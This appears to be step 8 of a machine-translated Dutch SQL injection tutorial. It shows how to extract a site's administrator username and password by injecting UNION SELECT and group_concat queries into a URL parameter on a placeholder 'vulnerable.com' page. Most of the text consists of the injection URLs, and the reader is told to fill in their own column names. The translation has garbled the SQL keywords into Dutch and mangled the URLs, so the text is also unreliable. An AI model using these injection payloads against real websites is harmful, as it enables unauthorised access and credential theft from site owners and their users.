Stap 8: Het vinden van de beheerder gebruikersnaam en wachtwoord - deel 1
Dit is de laatste fase, verwijderen van de opdrachten die vetis:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1-Unie Selecteer 1, group_concat (column_name), 3,4,5,6,7,8 van information_schema.columns waar table_name = 0x6e696674795f61646d696e--
Hier is het webadres u met zitten:
http://vulnerable.com/goodies.php?id=-1/buy.php?id=-1 Unie select 1, group_concat (), 3,4,5,6,7, 8 van
Nu, tussen de haakjes van de opdracht group_concat(), Type in de volgende woorden:
* Username_Column *, 0x20616e6420, * Password_Column *
Vervang * Username_Column * met de naam van de kolom van uw gebruikersnaam en de * Password_Column * met de naam van de kolom van uw wachtwoord (In mijn geval, admin is de naam van de kolom gebruikersnaam en wachtwoord als kolomnaam gebruikt de pass is)
Uw web-adres zal nu als volgt uitzien:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1-Unie Selecteer 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 van
